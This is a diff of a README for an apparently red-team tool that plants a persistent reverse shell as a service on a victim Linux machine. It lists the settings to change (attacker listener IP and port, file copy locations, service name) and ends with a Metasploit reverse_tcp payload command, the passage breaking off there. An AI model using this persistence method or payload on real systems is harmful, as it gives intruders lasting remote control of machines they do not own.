moizskapasi/Red-Teaming/Persistent-Shell/README.md

 The shell retains the user that creates this file on the victim machine.

+### Required changes to the script:

+- The *ip* and *port* of the attacker listener
+- The *destinations* and *filename* for the copies
+- The *service_name* of the unit

-I tried with basic netcat but the connection is not stable because the shell being created is from a service.
+I tried with basic netcat to recieve the connection, but it is not stable because the shell being created is from a service.
 To run properly use the following Metasploit module/commands:

 ```
 msf6> use payload/linux/x64/shell/reverse_tcp